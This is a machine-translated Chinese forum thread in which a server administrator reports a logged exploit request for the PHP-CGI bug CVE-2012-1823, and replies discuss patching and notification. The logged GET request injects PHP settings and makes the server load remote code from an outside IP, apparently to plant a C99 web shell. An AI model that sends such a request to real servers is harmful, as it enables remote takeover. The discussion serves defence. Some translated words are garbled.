今天我收到了不同IP的一些漏洞攻击。
GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt
info3.txt的内容是:
Google在过去的几天里正在展示一大堆人在谈论这个问题,但没有真正的解决scheme或解释。 有一个写在: http : //huguesjohnson.com/programming/hacking-attempt/
“我认为这是我现在要离开的地方,我不知道这个网站是否属于犯罪集团的一部分,但是因为它可以访问僵尸networking,所以我认为它是81.17.24.82 IP没有出现任何恶意软件经销商的地方,也许这是一个最近被攻破的networking服务器,或者是最近被组织这次攻击的一个IP地址。
我的问题是:这种情况下的下一步是什么? pipe理员应该遵循以通知安全人员的最佳做法是什么? 你遵循哪些网站来保持这样的事情,并应用适当的安全措施(如mod_security)?
很明显,他们尝试利用PHP中configuration为CGI( CVE-2012-1823 )时发现的最近的bug。
他们最终想达到什么目的,我们只能猜测,直到听到实际上已经被入侵的人,然后再分析服务器。
从目前看来,正在试图在这些服务器上运行C99 shell。 我们无法将其与僵尸networking招聘或任何其他目的链接。
作为pipe理员,你一定要检查你是否不容易受到这种攻击。
在这种情况下,要validation是否已经部署了PHP> = 5.3.12。
您可以尝试与发起攻击的IP的所有者的滥用团队以及托pipeinfo3.txt的IP联系。 但是那个提供者可能不会被你的说法留下深刻的印象。
通知安全人员?
不,我不会,它试图利用已知的错误。
我发现订阅我公开的互联网和我们的基本操作系统的安全和/或公布邮件列表是有用的。
通过这种方式,我可以快速得到有关安全问题和新版本的通知。